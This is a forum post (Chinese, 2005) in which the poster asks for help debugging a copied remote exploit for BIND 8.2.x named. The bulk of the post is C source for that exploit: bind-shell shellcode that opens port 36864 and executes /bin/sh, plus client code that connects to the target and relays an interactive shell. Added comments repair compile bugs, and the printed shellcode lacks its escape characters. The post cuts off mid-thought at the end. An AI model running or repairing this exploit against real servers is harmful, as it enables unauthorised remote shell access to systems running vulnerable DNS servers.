ChenFengqing 2005年03月18日
小弟想搞定这个调试不了的程序,请教高手揭贴,NB的人只管进,希望揭贴的时候就可以用来调试,这是个黑客攻击程序(复制得来的),不知道
BIND8.2.x的exploit代码

/*
* This exploit has been fixed and extensive explanation and clarification
* added.
* Cleanup done by:
* Ian Goldberg <ian@cypherpunks.ca>
* Jonathan Wilkins <jwilkins@bitland.net>
* NOTE: the default installation of RedHat 6.2 seems to not be affected
* due to the compiler options. If BIND is built from source then the
* bug is able to manifest itself.
*/
/*
* Original Comment:
* lame named 8.2.x remote exploit by
*
* Ix [adresadeforward@yahoo.com] (the master of jmpz),
* lucysoft [lucysoft@hotmail.com] (the master of queries)
*
* this exploits the named INFOLEAK and TSIG bug (see
* http://www.isc.org/products/BIND/bind-security.html)
* linux only shellcode
* this is only for demo purposes, we are not responsible in any way for what you do with this code.
*
* flamez - canaris
* greetz - blizzard, netman.
* creditz - anathema <anathema@hack.co.za> for the original shellcode
* - additional code ripped from statdx exploit by ron1n
*
* woo, almost forgot... this exploit is pretty much broken (+4 errors), but we hope you got the idea.
* if you understand how it works, it won't be too hard to un-broke it
*/

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>

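/*
 * Larger of two values. As printed the macro had lost the ':' of the
 * conditional operator and could not compile; restored here. Being a plain
 * macro it may evaluate each argument twice, so pass only side-effect-free
 * expressions (runshell() passes file descriptors).
 */
#define max(a,b) ((a)>(b)?(a):(b))

#define BUFFSIZE 4096

/* NOTE(review): not referenced in this part of the file; presumably set and
 * read by the query-building code that follows it. */
int argevdisp1, argevdisp2;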

char shellcode[] = /*
 * x86 Linux payload written as one string literal per instruction, with the
 * intended assembly alongside. Going by the annotations it issues socket(),
 * bind() on TCP port 0x9000 (36864 -- the same port connection() below
 * dials, so the two must be changed together), listen(), accept(), dup2()
 * onto fds 0-2 and execve("/bin/sh"). A new listener on 36864 (presumably
 * inside the named process) is the artifact a defender would watch for.
 *
 * The numbers at the right indicate the number of bytes the call takes
 * and the number of bytes used so far. This needs to be lower than
 * 62 in order to fit in a single Query Record. 2 are used in total to
 * send the shell code.
 *
 * NOTE(review): as printed on this page the literals read "xebx44",
 * "x5e", ... -- ordinary letters, not "\x" byte escapes -- so the array
 * as shown holds ASCII text, not the bytes the annotations describe.
 */
/* main: */
/* "callz" is more than 127 bytes away, so we jump to an intermediate
spot first */
"xebx44" /* jmp intr */ // 2 - 2
/* start: */
"x5e" /* popl %esi */ // 1 - 3

/* socket() */
"x29xc0" /* subl %eax, %eax */ // 2 - 5
"x89x46x10" /* movl %eax, 0x10(%esi) */ // 3 - 8
"x40" /* incl %eax */ // 1 - 9
"x89xc3" /* movl %eax, %ebx */ // 2 - 11
"x89x46x0c" /* movl %eax, 0x0c(%esi) */ // 3 - 14
"x40" /* incl %eax */ // 1 - 15
"x89x46x08" /* movl %eax, 0x08(%esi) */ // 3 - 18
"x8dx4ex08" /* leal 0x08(%esi), %ecx */ // 3 - 21
"xb0x66" /* movb $0x66, %al */ // 2 - 23
"xcdx80" /* int $0x80 */ // 2 - 25

/* bind() */
"x43" /* incl %ebx */ // 1 - 26
"xc6x46x10x10" /* movb $0x10, 0x10(%esi) */ // 4 - 30
"x66x89x5ex14" /* movw %bx, 0x14(%esi) */ // 4 - 34
"x88x46x08" /* movb %al, 0x08(%esi) */ // 3 - 37
"x29xc0" /* subl %eax, %eax */ // 2 - 39
"x89xc2" /* movl %eax, %edx */ // 2 - 41
"x89x46x18" /* movl %eax, 0x18(%esi) */ // 3 - 44
/*
* the port address in hex (0x9000 = 36864), if this is changed, then a similar
* change must be made in the connection() call
* NOTE: you only get to set the high byte
*/
"xb0x90" /* movb $0x90, %al */ // 2 - 46
"x66x89x46x16" /* movw %ax, 0x16(%esi) */ // 4 - 50
"x8dx4ex14" /* leal 0x14(%esi), %ecx */ // 3 - 53
"x89x4ex0c" /* movl %ecx, 0x0c(%esi) */ // 3 - 56
"x8dx4ex08" /* leal 0x08(%esi), %ecx */ // 3 - 59

"xebx02" /* jmp cont */ // 2 - 2
/* intr: */
"xebx43" /* jmp callz */ // 2 - 4

/* cont: */
"xb0x66" /* movb $0x66, %al */ // 2 - 6
"xcdx80" /* int $0x80 */ // 2 - 10

/* listen() */
"x89x5ex0c" /* movl %ebx, 0x0c(%esi) */ // 3 - 11
"x43" /* incl %ebx */ // 1 - 12
"x43" /* incl %ebx */ // 1 - 13
"xb0x66" /* movb $0x66, %al */ // 2 - 15
"xcdx80" /* int $0x80 */ // 2 - 17

/* accept() */
"x89x56x0c" /* movl %edx, 0x0c(%esi) */ // 3 - 20
"x89x56x10" /* movl %edx, 0x10(%esi) */ // 3 - 23
"xb0x66" /* movb $0x66, %al */ // 2 - 25
"x43" /* incl %ebx */ // 1 - 26
"xcdx80" /* int $0x80 */ // 1 - 27

/* dup2(s, 0); dup2(s, 1); dup2(s, 2); */
"x86xc3" /* xchgb %al, %bl */ // 2 - 29
"xb0x3f" /* movb $0x3f, %al */ // 2 - 31
"x29xc9" /* subl %ecx, %ecx */ // 2 - 33
"xcdx80" /* int $0x80 */ // 2 - 35
"xb0x3f" /* movb $0x3f, %al */ // 2 - 37
"x41" /* incl %ecx */ // 1 - 38
"xcdx80" /* int $0x80 */ // 2 - 40
"xb0x3f" /* movb $0x3f, %al */ // 2 - 42
"x41" /* incl %ecx */ // 1 - 43
"xcdx80" /* int $0x80 */ // 2 - 45

/* execve() */
"x88x56x07" /* movb %dl, 0x07(%esi) */ // 3 - 48
"x89x76x0c" /* movl %esi, 0x0c(%esi) */ // 3 - 51
"x87xf3" /* xchgl %esi, %ebx */ // 2 - 53
"x8dx4bx0c" /* leal 0x0c(%ebx), %ecx */ // 3 - 56
"xb0x0b" /* movb $0x0b, %al */ // 2 - 58
"xcdx80" /* int $0x80 */ // 2 - 60

"x90" /* padding byte, presumably a nop; not annotated by the author */

/* callz: */
"xe8x72xffxffxff" /* call start */ // 5 - 5
"/bin/sh"; /* There's a NUL at the end here */ // 8 - 13

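/*
 * Resolve a dotted-quad string or host name to an IPv4 address.
 *
 * @param host  NUL-terminated dotted-quad or host name; NULL yields 0.
 * @return the address in network byte order, or 0 if it cannot be resolved.
 *
 * Two fixes over the original: inet_addr() returns an unsigned in_addr_t, so
 * the old "0 > res" test could never see INADDR_NONE where long is wider than
 * 32 bits (the name lookup was then skipped); and the address is copied out of
 * the hostent with memcpy instead of an "unsigned long" dereference, which on
 * LP64 read 8 bytes from a 4-byte, possibly misaligned entry.
 */
unsigned long resolve_host(char* host)
{
    in_addr_t addr;
    struct hostent *he;
    struct in_addr in;

    if (host == NULL)
        return 0;

    addr = inet_addr(host);
    if (addr == INADDR_NONE) {
        he = gethostbyname(host);
        /* require an IPv4 entry of the expected size before copying */
        if (he == NULL || he->h_addr_list == NULL || he->h_addr_list[0] == NULL
            || he->h_length != (int)sizeof in)
            return 0;
        memcpy(&in, he->h_addr_list[0], sizeof in);
        addr = in.s_addr;
    }
    return (unsigned long)addr;
}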

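/*
 * Print a hex dump of buff to stdout: 16 bytes per row, each row followed
 * by its printable-ASCII rendering (non-printable bytes shown as '.').
 *
 * @param buff  bytes to dump; not a C string, may contain NULs.
 * @param len   number of bytes; zero or negative prints only a newline.
 * @return len.
 *
 * The original declared an int return but never returned a value, and it
 * dropped the ASCII column of the final row whenever len was not a multiple
 * of 16 (and of the only row for short buffers). Both are fixed.
 */
int dumpbuf(char *buff, int len)
{
    char line[17];
    int x;
    int col = 0;

    for (x = 0; x < len; x++) {
        col = x % 16;
        if (col == 0 && x) {
            /* previous row is complete: flush its ASCII rendering */
            line[16] = '\0';
            printf(" %s\n", line);
        }
        printf("%02X ", (unsigned char)buff[x]);
        line[col] = isprint((unsigned char)buff[x]) ? buff[x] : '.';
    }

    if (len > 0) {
        /* last (possibly partial) row: pad so the ASCII column lines up */
        line[col + 1] = '\0';
        for (x = col + 1; x < 16; x++)
            printf("   ");
        printf(" %s", line);
    }
    printf("\n");
    return len;
}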

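/* Write all n bytes of p to fd, retrying on short writes; -1 on error. */
static int write_all(int fd, const char *p, size_t n)
{
    while (n > 0) {
        ssize_t w = write(fd, p, n);
        if (w < 0)
            return -1;
        p += w;
        n -= (size_t)w;
    }
    return 0;
}

/*
 * Relay bytes between the local terminal and a connected socket until one
 * side closes: data from the socket goes to stdout, data from stdin goes to
 * the socket. Does not return -- every way out calls exit().
 *
 * @param sockd  connected TCP socket.
 *
 * Fixes over the original: the loop header had lost its ";)" and could not
 * compile; read() errors were passed to send() as a negative length; EOF on
 * stdin made select() report stdin readable forever (busy loop); the result
 * of write() was ignored; and the banner length counted the literal's
 * terminating NUL.
 */
void
runshell(int sockd)
{
    static const char banner[] = "uname -a; id;\n";
    char buff[1024];
    int in_fd = fileno(stdin);
    int fmax = (sockd > in_fd ? sockd : in_fd) + 1;
    ssize_t ret;
    fd_set fds;

    send(sockd, banner, sizeof banner - 1, 0);

    for (;;) {
        FD_ZERO(&fds);
        FD_SET(in_fd, &fds);
        FD_SET(sockd, &fds);

        if (select(fmax, &fds, NULL, NULL, NULL) < 0)
            exit(EXIT_FAILURE);

        if (FD_ISSET(sockd, &fds)) {
            ret = recv(sockd, buff, sizeof buff, 0);
            if (ret < 0)
                exit(EXIT_FAILURE);
            if (ret == 0) {
                fprintf(stderr, "Connection closed\n");
                exit(EXIT_FAILURE);
            }
            if (write_all(fileno(stdout), buff, (size_t)ret) < 0)
                exit(EXIT_FAILURE);
        }

        if (FD_ISSET(in_fd, &fds)) {
            ret = read(in_fd, buff, sizeof buff);
            if (ret < 0)
                exit(EXIT_FAILURE);
            if (ret == 0) {
                /* local EOF: nothing more to relay, leave cleanly */
                fprintf(stderr, "Input closed\n");
                exit(EXIT_SUCCESS);
            }
            if (send(sockd, buff, (size_t)ret, 0) != ret) {
                fprintf(stderr, "Transmission loss\n");
                exit(EXIT_FAILURE);
            }
        }
    }
}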


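/*
 * Dial TCP port 36864 on host and, if the connect succeeds, relay the
 * session through runshell(); otherwise report the failure.
 *
 * @param host  target address (by value); sin_port is overwritten with
 *              36864 (0x9000), the port hard-coded in the shellcode --
 *              the two must be changed together.
 * @return 0 after a failed connect() attempt; never returns after a
 *         successful one, because runshell() only exits the process.
 *         Exits the process if no socket can be created.
 *
 * The original had no return type (implicit int, invalid since C99) and no
 * return statement, and its printf strings had been split across lines by
 * the page rendering; both repaired. Returning 0 keeps existing callers,
 * which ignore the value, unaffected.
 */
int
connection(struct sockaddr_in host)
{
    int sockd;

    host.sin_port = htons(36864);

    printf("\n* connecting..\n");
    usleep(2000);

    sockd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sockd < 0)
        exit(EXIT_FAILURE);

    if (connect(sockd, (struct sockaddr *) &host, sizeof host) == 0) {
        printf("\n* wait for your shell..\n");
        usleep(500);
        runshell(sockd);
    } else {
        printf("[x] error: named not vulnerable or wrong offsets used\n");
    }

    /* only reached on connect() failure; runshell() never returns */
    close(sockd);
    return 0;
}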
    #################################################################################下面也是

